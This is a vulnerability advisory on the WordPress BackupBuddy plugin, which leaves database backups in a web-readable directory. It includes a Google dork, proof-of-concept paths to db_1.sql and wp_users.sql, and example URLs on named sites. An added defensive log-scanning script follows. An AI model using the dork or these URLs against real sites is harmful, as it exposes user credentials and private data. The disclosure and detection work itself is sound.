The WordPress BackupBuddy plugin fails to adequately protect its backup files: it relies on placing them in web-accessible directories whose only protection is a "random" directory name, so anyone who learns or guesses the path can download the database dumps directly.
# WordPress 'BackupBuddy' Plugin Exposure of Backup Files to an Unauthorized Control Sphere
# CWE: CWE-530
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 15/05/2015
# Vendor Homepage: https://ithemes.com/purchase/backupbuddy/
# Google Dork: inurl:/wp-content/uploads/backupbuddy_temp/
# PoC:
http://SITE.COM/wp-content/uploads/backupbuddy_temp/<RANDOM NAME>/db_1.sql
or
http://SITE.COM/wp-content/uploads/backupbuddy_temp/<RANDOM NAME>/wp_users.sql
# Examples:
http://intouchhome.com/wp-content/uploads/backupbuddy_temp/rollback_nwb0cpc4r6/wp_users.sql
http://www.article2range.com/wp-content/uploads/backupbuddy_temp/61fmr70xk7/db_1.sql
and others.
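For a site owner who wants to know whether the exposure described above has already been used against them, the following is an added example (not part of the advisory and not BackupBuddy code) that scans web-server access logs in the common "combined" format for requests under `/wp-content/uploads/backupbuddy_temp/`. Requests that were actually served (2xx) are the confirmed disclosures; requests that were denied or missed (403, 404) are still worth alerting on because they show someone probing for the backup directory. The log lines are constructed samples, not real traffic.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample access-log lines in Apache/nginx "combined" format
# (example addresses from RFC 5737 documentation ranges; not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [15/May/2015:10:01:02 +0000] "GET /wp-content/uploads/backupbuddy_temp/61fmr70xk7/db_1.sql HTTP/1.1" 200 5242880 "-" "Mozilla/5.0"
203.0.113.5 - - [15/May/2015:10:01:09 +0000] "GET /wp-content/uploads/backupbuddy_temp/61fmr70xk7/wp_users.sql HTTP/1.1" 200 40960 "-" "Mozilla/5.0"
198.51.100.7 - - [15/May/2015:10:02:00 +0000] "GET /wp-content/uploads/2015/05/logo.png HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.9 - - [15/May/2015:10:03:00 +0000] "GET /wp-content/uploads/backupbuddy_temp/ HTTP/1.1" 403 199 "-" "curl/7.38"
192.0.2.4 - - [15/May/2015:10:04:00 +0000] "GET /wp-content/uploads/backupbuddy_temp/rollback_nwb0cpc4r6/wp_users.sql HTTP/1.1" 404 162 "-" "python-requests/2.7"
"""

# Minimal parser for the combined log format: client IP, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# The BackupBuddy temp directory is the one the advisory identifies as exposed.
BACKUP_DIR_MARKER = "/backupbuddy_temp/"


def parse_line(line):
    """Parse one access-log line; returns a dict or None if the line does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Normalise the request target: strip any query string and decode %-escapes so
    # an encoded path cannot slip past the substring check below.
    rec["path"] = unquote(urlsplit(rec["target"]).path)
    rec["status"] = int(rec["status"])
    return rec


def find_backup_requests(log_text):
    """Return (served, probed).

    served: requests under backupbuddy_temp/ that got a 2xx, i.e. a backup or
            directory content was actually handed out.
    probed: requests under backupbuddy_temp/ that were denied or missed; these
            show reconnaissance for the directory even when nothing leaked.
    """
    served, probed = [], []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or BACKUP_DIR_MARKER not in rec["path"].lower():
            continue
        (served if 200 <= rec["status"] < 300 else probed).append(rec)
    return served, probed


def leaked_files(log_text):
    """Convenience view: (client_ip, path) pairs for every backup file actually served."""
    served, _ = find_backup_requests(log_text)
    return [(r["ip"], r["path"]) for r in served]


if __name__ == "__main__":
    served, probed = find_backup_requests(SAMPLE_LOG)
    for r in served:
        print(f"LEAKED  {r['ts']} {r['ip']} -> {r['path']} ({r['size']} bytes)")
    for r in probed:
        print(f"PROBED  {r['ts']} {r['ip']} -> {r['path']} (HTTP {r['status']})")
```

Run it against a real log with `find_backup_requests(open("access.log").read())`; any entry in `served` means the dump was downloaded and the credentials and data in it should be treated as compromised. The detection only tells you what already happened; the durable fix is to keep backups outside the document root or deny direct web access to the backup directory at the web-server level, rather than relying on an unguessable directory name.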